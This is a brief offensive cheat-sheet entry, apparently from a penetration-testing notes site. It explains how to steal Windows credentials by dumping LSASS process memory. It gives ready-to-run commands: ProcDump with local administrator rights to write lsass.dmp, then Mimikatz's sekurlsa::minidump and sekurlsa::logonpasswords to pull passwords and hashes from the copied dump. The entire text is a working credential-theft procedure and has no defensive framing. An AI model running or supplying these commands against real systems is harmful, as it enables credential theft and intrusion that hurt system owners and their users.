LSASS DUMP
ProcDump - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
Run procdump.exe with LOCAL ADMINISTRATOR PRIVILEGE to dump LSASS.exe process
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp.\procdump.exe -r -ma lsass.exe lsass.dmpAfter copying the lsass.dmp dump file to local machin, use Mimikatz's minidump to extract secrets
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords /all
Last updated